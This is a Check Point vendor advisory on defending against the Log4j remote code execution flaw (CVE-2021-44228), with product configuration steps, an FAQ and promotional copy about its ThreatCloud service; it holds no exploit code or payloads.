How Check Point Infinity Protects Customers from the Log4j Vulnerability

On December 9th, an acute remote code execution (RCE) vulnerability was reported in the Apache logging package Log4j 2 versions 2.14.1 and below (CVE-2021-44228). Apache Log4j is the most popular java logging library with over 400,000 downloads from its GitHub project. The Log4j library is embedded in almost every Internet service or application we are familiar with, including Twitter, Amazon, Microsoft, Minecraft and more.

Exploiting this vulnerability is simple and allows threat actors to control java-based web servers and launch remote code execution attacks.

Check Point’s Infinity Platform is the only security platform that offered pre-emptive protection for customers against the recent Log4j exploit (Log4Shell). Leveraging contextual AI, the platform provides precise prevention of even the most sophisticated nascent attacks, without generating false positives. Customer web applications remain safe as the security auto updates without the need for human intervention or rule sets, as the app and threat landscape evolve and expands.

Check Point Customers Remain Protected: Check Point has already released a new Quantum Gateway protection to prevent this attack, powered by ThreatCloud. If your Quantum gateways are updated with automatic new protections, you are already protected. Otherwise, you need to implement a new protection by following the guidelines here. We urge IT and Security teams to take immediate remediation measures on the matter.

How to ensure you are protected from the Log4j Vulnerability

1. Make sure your IPS blade is in prevention mode
2. Make sure your AppSec is in prevention mode
3. Make sure Infinity NDR is configured to detect exploited servers and internal scans on your network
4. Make sure your Harmony Endpoint is in prevention mode
5. Make sure you scan your code using SourceGuard
6. Scan Serverless functions with CloudGuard Workload Protection

1. Make sure your IPS blade is in prevention mode

In case your setup is not configured to auto-update, you need to make sure that you are protected.

1. Check if your gateway already contains the IPS update with the protection against the CVE through the following steps:
   1. In SmartConsole, click Gateways & Servers
   2. Switch the columns view to Threat Prevention.
   3. You will see a column with the title ‘Installed IPS version’ for each gateway.
   4. Make sure that all the gateways are updated with the latest package (from 12/12/2021)
      
   5. You can also make sure that the specific protection has been updated by clicking Security Policies >
      Threat Prevention > IPS protections, then search for “Apache Log4j Remote Code Execution
      (CVE-2021-44228)”
   6. Your profile column should be on prevent
      
2. If you can’t see the relevant package, you need to update your setup with the latest package, by following these steps:
   1. In SmartConsole, click Security Policies > Threat Prevention.
   2. In the Custom Policy Tools section, click Updates, and then click the IPS section > Update Now.
   3. Install the Threat Prevention Policy.
      
      
   4. Repeat step #1 to make sure you have updated all the GWs.

2. Make sure your AppSec is in prevention mode

1. In the Infinity Policy dashboard, click Cloud > Assets.
2. Search for Log4J (CVE-2021-44228) (you can use the search bar)
3. Click on the Asset > Threat Prevention
4. Make sure that the mode is configure to Prevent.
   
   

Upgrade Apache Log4j to the latest version (2.15.0) or apply the recommended mitigations that were published by Apache on their website

3. Make sure Infinity NDR is configured to detect exploited servers and internal scans on your network

1. From the Notification menu, schedule a notification on ‘Exploit: Apache Log4j’
2. Upon email receipt, review the event from the Analytics page, take further steps to identify unauthorized scanners, and perform further remediation steps

4. Make sure your Harmony Endpoint is in prevention mode

Detection Signatures have been updated to proactively protect you.
To ensure full protection, make certain your behavioral guard is set to Prevent mode

1. 1. In Harmony Endpoint, choose Policy
   2. Click the Behavioral Protection tab
   3. Open the Anti-Ransomware Mode dropdown menu and click on Prevent

In addition, Check Point provides investigation scripts that can help you check your Endpoints and determine if they are vulnerable to the Log4j exploit for both Windows and Linux.
For further information and step-by-step instructions refer to sk176951.

5. Make sure you scan your code using SourceGuard

1. From the Check Point Infinity Portal, download and install SourceGuard CLI according to yourOS.
2. Generate an authentication token
3. From the command line, run: “sourceguard-cli –src ”
4. Review the scan results in Infinity Portal to make sure you use the safe version of the Log4j library

6. Scan Serverless functions with CloudGuard Workload Protection

1. Static scanning of lambda functions – identify vulnerable log4j versions and trigger a high-severity alert
2. Runtime protection – input workload firewall for log4j patterns, and behavioral analysis of outgoing traffic like unauthorized network hosts

Log4j protection FAQ

1. Q: Are the GW and MGMT vulnerable to the attack if IPS blade isn’t active?
   A: No. All Check Point products are protected against the vulnerability, as described in sk176865.
2. Q: Does HTTPS inspection is needed to protect against Log4j?
   A: As some of the uses of the vulnerability may use HTTPS, you should enable HTTPS inspection in order to be fully protect against the vulnerability.
3. Q: How to manual update the IPS protection for air-gaped environments?
   A: Please refer to sk93724 that describe the requirements.
4. Q: Should I configure the IPS on auto-update?
   A: In order to be protected against the latest threats, we advise to configure auto-update.
5. Q: How does the Log4J IPS protection impact the performance?
   A: The Log4j protection is enable by default in the ‘Optimized’ profile due to security considerations. Please note that enabling HTTPS inspection may cause performance decrease.
6. Q: When is the exact time that the IPS protection was published?
   A: On the same day the CVE was firstly published. Exact time is December 10, 22:49 GMT+2 time.
7. Q: Are Check Point products and infrastructure vulnerable?
   A: No. All Check Point products are protected against the vulnerability, as described in sk176865.
8. Q: Is there any need to define and push new policy in the Quantum GW?
   A: There is no need to define new policy, but you may need to install policy if the gateway is not configure to auto update:As described in the Threat Prevention Administration Guide:For the IPS blade, prior to R80.20, the updates were downloaded to the Security Management Server, and only after you installed policy, the gateways could enforce the updates.
   Starting from R80.20, the gateways can directly download the updates. For R80.20 gateways and higher with no internet connectivity, you must still install policy to enforce the updates.

   Please validate the updates configuration on your setup and make sure to install the policy if needed.
   For more details about IPS protection updates in R80.20 and higher, please refer to sk120255.

9. Q: For Harmony Endpoint, does it matter what version you are using to have the relevant protection?
   A: No. The Behavioral Guard protection applies for all Harmony Endpoint versions and for both Windows as well as Linux endpoints.
10. Q: Does Security Gateway R77 is able to protect from the Log4j vulnerability?
    A: Yes. Security Gateway R81/ R80 / R77 / R75 are protecting against this vulnerability by using the relevant IPS protection.
11. Q: Does CloudGuard AppSec protects from the vulnerability on HTTPS traffic?
    A: Yes, AppSec can decrypt HTTPS traffic after configured with the relevant certificates and protect from the Log4j vulnerability.
12. Q: If a server on the network was breached, can the GW protected against outbound communication from this server?
    A: The Quantum GW can block outbound communication to malicious domains with Threat Prevention blades. According to the best security practices you should prevent the attack at the first stage by updating the venerable server and protect it with relevant protection such as IPS.
13. Q: Can the GW inspect VPN traffic for the vulnerability?
    A: Yes, VPN traffic is inspected by IPS blade.

What is ThreatCloud

You can think of ThreatCloud as a brain, and like the human brain, it is made of two lobes that work together. The right lobe, the threat intelligence, consists of millions of IoCs and telemetry updated in real time, in addition to exclusive intelligence discovered by Check Point Research, an elite group of world-renowned researchers. The left lobe, the intellect, consists of AI technology that combines the big data threat intelligence with advanced AI capabilities to detect and block never seen before threats.

Instant protections from the most significant unknown software vulnerabilities

All software vulnerabilities that are found by CPR or seen in the wild, such as Log4j, are immediately fed to ThreatCloud, which propagates the appropriate protections throughout Check Point’s products, so that all Check Point customers are instantly protected with no patching needed.

That is exactly what happened last weekend. As soon as the Log4j vulnerability was reported on December 9, all relevant protections were propagated through all of Check Point products (refer to sk176884).